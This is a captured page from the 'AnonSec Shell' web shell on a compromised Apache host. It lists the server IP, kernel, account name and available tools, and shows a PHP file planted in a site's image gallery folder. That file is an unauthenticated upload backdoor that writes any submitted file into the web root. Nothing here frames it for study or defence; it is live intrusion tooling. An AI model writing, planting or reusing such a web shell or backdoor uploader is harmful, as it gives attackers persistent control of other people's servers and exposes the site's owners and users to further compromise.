AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/images/gallery/fab-competition-winners/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/atfycaf/www/images/gallery/fab-competition-winners/3367668392.php
<?php
if(isset($_POST['upl_files'])){
  echo '<div id="unCenter"><div class="Marged"><div class="Table">
        <div>Uploaded Files:<br></div>';
  //print_r($_FILES['file_n']);
  $up_mas = $_FILES['file_n'];
  $mas_name = array();
  $mas_tmp = array();
  for($i=0; $i<3; $i++){
    if(!empty($up_mas['name'][$i])){
      $j = count($mas_name);
      $mas_name[$j] = $up_mas['name'][$i];
      $mas_tmp[$j] = $up_mas['tmp_name'][$i];
      }
    }
  for($i=0; $i<count($mas_name); $i++){
    $upl_file = './'.$mas_name[$i];
    if(move_uploaded_file($mas_tmp[$i], $upl_file)){
      echo '<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a>,&nbsp';
      }
    }
  }
?>
            <center>
            <form enctype="multipart/form-data" method="post" action="">
            <?php
          for($i=0; $i<3; $i++){
            echo '<div><input class="Input" type="file" name="file_n[]"></div>';
            } ?>
            <div><input type="reset" name="reset" value="Reset">&nbsp;<input type="submit" name="upl_files" value="upload"></div>
            </center>

Anon7 - 2022
AnonSec Team